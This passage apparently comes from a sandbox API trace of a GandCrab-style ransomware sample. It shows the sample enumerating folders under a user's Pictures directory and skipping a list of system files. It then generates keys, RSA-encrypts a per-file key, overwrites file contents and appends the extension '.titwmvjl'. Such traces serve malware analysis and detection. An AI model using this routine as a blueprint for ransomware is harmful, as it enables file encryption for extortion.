param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\d2ca4a09d2ca4deb61a.lock") returned 97 [0094.718] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\mzwy6pg on\\wx1peowpoywi\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0094.720] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.720] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.720] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\") returned 73 [0094.720] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\*" [0094.720] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5037b8 [0094.720] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.721] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.722] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.722] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.722] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.722] lstrcmpW (lpString1="b4Lpcrx.gif", lpString2=".") returned 1 [0094.722] lstrcmpW (lpString1="b4Lpcrx.gif", lpString2="..") returned 1 [0094.722] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\", lpString2="b4Lpcrx.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif" [0094.722] lstrlenW (lpString=".titwmvjl") returned 9 [0094.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif") returned 84 [0094.722] VirtualAlloc (lpAddress=0x0, dwSize=0xe8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.722] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif.titwmvjl") returned 93 [0094.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif") returned 84 [0094.722] lstrlenW (lpString=".gif") returned 4 [0094.722] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.722] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".gif ") returned 5 [0094.722] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0094.722] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif") returned 84 [0094.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif") returned 84 [0094.722] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="desktop.ini") returned -1 [0094.722] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="autorun.inf") returned 1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="ntuser.dat") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="iconcache.db") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="bootsect.bak") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="boot.ini") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="ntuser.dat.log") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="thumbs.db") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="CRAB-DECRYPT.html") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="CRAB-DECRYPT.txt") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="ntldr") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="NTDETECT.COM") returned -1 [0094.723] lstrcmpiW (lpString1="b4Lpcrx.gif", lpString2="Bootfont.bin") returned -1 [0094.723] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif") returned 84 [0094.723] lstrlenW (lpString=".gif") returned 4 [0094.723] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.723] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".gif ") returned 5 [0094.723] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.723] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.723] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\mzwy6pg on\\wx1peowpoywi\\b4lpcrx.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0094.724] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.724] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0094.725] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.725] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0094.725] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.725] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.726] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.726] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0094.726] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.726] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.726] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.726] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.726] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0094.726] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.727] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.727] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.727] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0094.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.727] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.727] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.727] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0094.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.728] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5037f8) returned 1 [0094.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.728] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0094.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.728] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0094.728] GetLastError () returned 0x0 [0094.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.728] CryptDestroyKey (hKey=0x5037f8) returned 1 [0094.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.729] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.729] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0094.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.729] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503338) returned 1 [0094.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.729] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0094.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.730] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0094.730] GetLastError () returned 0x0 [0094.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.730] CryptDestroyKey (hKey=0x503338) returned 1 [0094.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.730] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.730] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.730] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.731] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x9c26, lpOverlapped=0x0) returned 1 [0094.743] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffff63da, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.743] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9c26, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x9c26, lpOverlapped=0x0) returned 1 [0094.748] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.748] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0094.750] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.753] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.754] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.754] CloseHandle (hObject=0x2cc) returned 1 [0094.754] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\mzwy6pg on\\wx1peowpoywi\\b4lpcrx.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\b4Lpcrx.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\mzwy6pg on\\wx1peowpoywi\\b4lpcrx.gif.titwmvjl"), dwFlags=0x1) returned 1 [0094.755] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.755] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.755] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0094.755] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0094.755] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\d2ca4a09d2ca4deb61a.lock" [0094.755] lstrlenW (lpString=".titwmvjl") returned 9 [0094.755] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\d2ca4a09d2ca4deb61a.lock") returned 97 [0094.755] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.755] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 106 [0094.755] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\d2ca4a09d2ca4deb61a.lock") returned 97 [0094.755] lstrlenW (lpString=".lock") returned 5 [0094.755] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.756] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0094.756] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.756] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.756] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.756] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0094.756] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0094.756] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\TITWMVJL-DECRYPT.txt" [0094.756] lstrlenW (lpString=".titwmvjl") returned 9 [0094.756] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\TITWMVJL-DECRYPT.txt") returned 93 [0094.756] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.756] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 102 [0094.756] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\TITWMVJL-DECRYPT.txt") returned 93 [0094.756] lstrlenW (lpString=".txt") returned 4 [0094.756] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.757] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0094.757] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0094.757] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.757] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\TITWMVJL-DECRYPT.txt") returned 93 [0094.757] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\wx1pEowPOYWi\\TITWMVJL-DECRYPT.txt") returned 93 [0094.757] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.757] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.757] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0094.757] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.757] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.757] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.757] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0094.757] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0094.757] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.757] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0094.757] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0094.758] CloseHandle (hObject=0x2c4) returned 1 [0094.758] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0094.758] FindClose (in: hFindFile=0x503778 | out: hFindFile=0x503778) returned 1 [0094.758] CloseHandle (hObject=0x2bc) returned 1 [0094.758] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0094.759] lstrcmpW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2=".") returned 1 [0094.759] lstrcmpW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="..") returned 1 [0094.759] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\", lpString2="N5MNejrqSH2rgwdQdper.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png" [0094.759] lstrlenW (lpString=".titwmvjl") returned 9 [0094.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png") returned 73 [0094.759] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.759] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png.titwmvjl") returned 82 [0094.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png") returned 73 [0094.759] lstrlenW (lpString=".png") returned 4 [0094.759] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.759] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0094.759] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0094.759] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png") returned 73 [0094.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png") returned 73 [0094.759] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="desktop.ini") returned 1 [0094.759] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="autorun.inf") returned 1 [0094.759] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="ntuser.dat") returned -1 [0094.759] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="iconcache.db") returned 1 [0094.759] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="bootsect.bak") returned 1 [0094.759] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="boot.ini") returned 1 [0094.759] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="ntuser.dat.log") returned -1 [0094.760] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="thumbs.db") returned -1 [0094.760] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.760] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.760] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="KRAB-DECRYPT.html") returned 1 [0094.760] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="CRAB-DECRYPT.html") returned 1 [0094.760] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.760] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.760] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="ntldr") returned -1 [0094.760] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="NTDETECT.COM") returned -1 [0094.760] lstrcmpiW (lpString1="N5MNejrqSH2rgwdQdper.png", lpString2="Bootfont.bin") returned 1 [0094.760] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png") returned 73 [0094.760] lstrlenW (lpString=".png") returned 4 [0094.760] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.760] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0094.760] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.760] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.760] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\N5MNejrqSH2rgwdQdper.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\n5mnejrqsh2rgwdqdper.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0094.761] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.761] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0094.761] SetFilePointerEx (in: hFile=0x2bc, 